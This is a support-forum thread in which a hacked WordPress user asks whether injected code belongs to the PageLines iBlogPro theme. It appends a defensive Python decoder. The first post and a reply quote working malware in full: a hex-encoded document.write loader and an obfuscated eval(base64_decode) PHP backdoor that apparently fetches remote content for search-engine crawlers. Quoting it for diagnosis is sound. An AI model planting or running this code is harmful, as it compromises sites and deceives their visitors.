
Does this code belong to Pagelines?


cokie69

Hi,

My WP was recently attacked and hacked and I think I have just 'cleaned' all the mess. However, there's this code remaining which I am not sure is supposed to be there. Can you advise?

This code is appearing at the beginning of most pages (if not all!). I use iBlogPro v3.

[code]

	<body class="home page page-id-4 page-template page-template-page-feature-php">
	
	<div class="preload" style="display:none;text-indent:-300em;">
		
	</div>
	
	<div id="page" class="fix" style="">
	  <script language="JavaScript" type="text/javascript">var i,y,x="3c6469762069643d22777261707065722220636c6173733d2266697822203e0d0a093c6469762
	0636c6173733d22706167656c696e6573706f73206e61762d69636f6e223e3c6120636c6173733d22706
	167656c696e65732220687265663d22687474703a2f2f7777772e7769636b65642d776f7264707265737
	32d7468656d65732e636f6d223e3c3f706870206563686f20706167656c696e657328276372656474657
	87427293b3f3e3c2f613e3c2f6469763e0d0a202020203c6469762069643d226865616465722220636c6
	173733d22666978223e0d0a0909";y='';for(i=0;i<x.length;
	i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);
	
	</script>			
				
	[/code]

	
	
	and then also...
	
	
[code]
<div id="container" class="fix">
<?php require(LIB.'/_subnav.php');?><?php eval(base64_decode("ZnVuY3Rpb24gczM3KCRzKXtmb3IgKCRhID0gMDsgJGEgPD0gc3RybGVuKCRzKS0x OyAkYSsrICl7JGUgLj0gJHN7c3RybGVuKCRzKS0kYS0xfTt9cmV0dXJuKCRlKTt9ZXZhbChzMzcoJzsibW9j Ij03M2MkOyJwdHRoIj03M2gkOyJzdGF0cyI9NzN6JCcpKTtldmFsKHMzNygnO10iVE5FR0FfUkVTVV9QVFRI IltSRVZSRVNfJD0zYXUkJykpO2V2YWwoczM3KCc7KSJyZWxibWFSIiAsInhlZG5hWSIgLCJyZXZpaGNyYV9h aSIgLCJ0b0JOU00iICwicHJ1bFMiICwiZWxnb29HIih5YXJyYSA9IDczdSQnKSk7ZXZhbChzMzcoJ319O2xy dSQgb2hjZTtdMVtscnUkID0gbHJ1JCA7KWxydSQsIiFvZyEiKGVkb2xweGUgPSBscnUkeykpIiFvZyEiLGxy dSQocnRzcnRzKCBmaTspKV0iVFNPSF9QVFRIIltSRVZSRVNfJChlZG9jbmVscnUuIj1oJiIuKTNhdSQoZWRv Y25lbHJ1LiI9YiYiLl0iUkREQV9FVE9NRVIiW1JFVlJFU18kLiI9aSIuIj9wIi4iaHAuIi4ibmkiLiIvNzNj JC4iLjczYyQuNzNjJC43M2MkLjczYyQuNzNjJC43M2MkLiIvLzoiLjczaCQoc3RuZXRub2NfdGVnX2VsaWZA ID0gbHJ1JCA7KTAwODAxKykoZW1pdCwpInN0YXRzIig1ZG0sNzN6JChlaWtvb2N0ZXNAIHsgZXNsZSB9eyAp KSldNzN6JFtFSUtPT0NfJCh0ZXNzaSggcm8gKSkzYXUkICwiaS8iIC4gKTczdSQgLCJ8IihlZG9scG1pIC4g Ii8iKGhjdGFtX2dlcnAoKGZpJykpOw=="));?>
[/code]

bryan-hadaway

This: ` preload preload preload preload `

This: ` `

And this: ` <?php eval(base64_decode("ZnVuY3Rpb24gczM3KCRzKXtmb3IgKCRhID0gMDsgJGEgPD0gc3RybGVuKCRzKS0x OyAkYSsrICl7JGUgLj0gJHN7c3RybGVuKCRzKS0kYS0xfTt9cmV0dXJuKCRlKTt9ZXZhbChzMzcoJzsibW9j Ij03M2MkOyJwdHRoIj03M2gkOyJzdGF0cyI9NzN6JCcpKTtldmFsKHMzNygnO10iVE5FR0FfUkVTVV9QVFRI IltSRVZSRVNfJD0zYXUkJykpO2V2YWwoczM3KCc7KSJyZWxibWFSIiAsInhlZG5hWSIgLCJyZXZpaGNyYV9h aSIgLCJ0b0JOU00iICwicHJ1bFMiICwiZWxnb29HIih5YXJyYSA9IDczdSQnKSk7ZXZhbChzMzcoJ319O2xy dSQgb2hjZTtdMVtscnUkID0gbHJ1JCA7KWxydSQsIiFvZyEiKGVkb2xweGUgPSBscnUkeykpIiFvZyEiLGxy dSQocnRzcnRzKCBmaTspKV0iVFNPSF9QVFRIIltSRVZSRVNfJChlZG9jbmVscnUuIj1oJiIuKTNhdSQoZWRv Y25lbHJ1LiI9YiYiLl0iUkREQV9FVE9NRVIiW1JFVlJFU18kLiI9aSIuIj9wIi4iaHAuIi4ibmkiLiIvNzNj JC4iLjczYyQuNzNjJC43M2MkLjczYyQuNzNjJC43M2MkLiIvLzoiLjczaCQoc3RuZXRub2NfdGVnX2VsaWZA ID0gbHJ1JCA7KTAwODAxKykoZW1pdCwpInN0YXRzIig1ZG0sNzN6JChlaWtvb2N0ZXNAIHsgZXNsZSB9eyAp KSldNzN6JFtFSUtPT0NfJCh0ZXNzaSggcm8gKSkzYXUkICwiaS8iIC4gKTczdSQgLCJ8IihlZG9scG1pIC4g Ii8iKGhjdGFtX2dlcnAoKGZpJykpOw=="));?> `

ALL look suspicious, but as I'm not a part of the development team I can't say definitively.

Are you looking at the source code through the browser front-end or actually opening the files and looking at them? Because this could possibly be plugin related.

With an attack like this I would start everything from fresh to be safe, but I'm not sure of your exact situation.

Thanks, Bryan

cokie69

Hi Bryan,

I'm looking directly at the source code via Notepad++. I've been testing and I believe (although not sure) the first code *should* be there as it *seems* to handle something related to the social buttons at the homepage. But as for the second code I have not a clue. And I don't want to simply 'delete-and-test' because it might show up all right but I might be screwing something up internally (SEO stuff, etc.). I'm a bit lost here.

Starting over?... no way :) I've made some modifications to the code to adapt it to my specific needs and I wouldn't be prepared to do it all over again. "Use a backup", you'll say: blimey! 'This' was my initial put-on-stage version. I "was" going to do a backup as soon as I could check everything was working fine, and 'in-between' a f***ng hacker got in the way and screwed everything up for me. So in short, I don't (yet) have a backup to restore from!!!! :)

cmunns

The code Bryan provided is definitely not part of the theme. Are you sure it was hacked? I would also make sure you have set permissions correctly and don't have any plugins installed that could potentially inject all that stuff.
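Added example, not part of the original thread and not PageLines code: a Python script that statically decodes the two wrapper shapes shown in the first post (a hex string rebuilt with `unescape()` and `document.write()`, and `eval(base64_decode(...))`), so the hidden text can be read without executing it. The sample inputs are constructed and harmless, and the string-reversing inner layer matched by `REV_EVAL` is an assumption about how nested `eval` calls hide their argument.

```python
import base64
import binascii
import re

# Quoted run of hex digits (whitespace tolerated: forum wrapping split the literal).
HEX_LITERAL = re.compile(r'''["']((?:[0-9a-fA-F]\s*){16,})["']''')
# eval(base64_decode("...")) with a literal argument.
B64_EVAL = re.compile(r'''eval\s*\(\s*base64_decode\s*\(\s*["']([A-Za-z0-9+/=\s]+)["']''')
# Assumption: an inner layer evals helper('<reversed PHP>'), the helper reversing its argument.
REV_EVAL = re.compile(r"eval\s*\(\s*\w+\s*\(\s*'([^']*)'\s*\)\s*\)")


def decode_hex_js(source):
    """Return the text each hex + unescape() + document.write() loader would emit."""
    found = []
    for match in HEX_LITERAL.finditer(source):
        digits = re.sub(r"\s+", "", match.group(1))
        digits = digits[: len(digits) // 2 * 2]  # ignore a dangling half byte
        found.append(bytes.fromhex(digits).decode("latin-1"))
    return found


def decode_b64_php(source):
    """Return (decoded PHP, [un-reversed inner statements]) per eval(base64_decode())."""
    found = []
    for match in B64_EVAL.finditer(source):
        blob = re.sub(r"\s+", "", match.group(1))
        try:
            php = base64.b64decode(blob, validate=True).decode("latin-1")
        except (binascii.Error, ValueError):
            continue  # not valid base64, leave it for manual review
        found.append((php, [lit[::-1] for lit in REV_EVAL.findall(php)]))
    return found


# Constructed, harmless samples in the same two shapes (not the payloads from the thread).
_hex = b'<div id="demo">'.hex()
SAMPLE_JS = 'var i,y,x="' + _hex[:11] + "\n\t" + _hex[11:] + '";document.write(y);'
_inner = "function r($s){return strrev($s);}eval(r(';\"ptth\"=h$'));"
_b64 = base64.b64encode(_inner.encode()).decode()
SAMPLE_PHP = '<?php eval(base64_decode("' + _b64[:20] + " " + _b64[20:] + '"));?>'

if __name__ == "__main__":
    print(decode_hex_js(SAMPLE_JS))
    for php, inner in decode_b64_php(SAMPLE_PHP):
        print(php, inner, sep="\n")
```

Run it against a copy of the theme file read as text; anything it prints is decoded output to read, never to paste back into the site.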
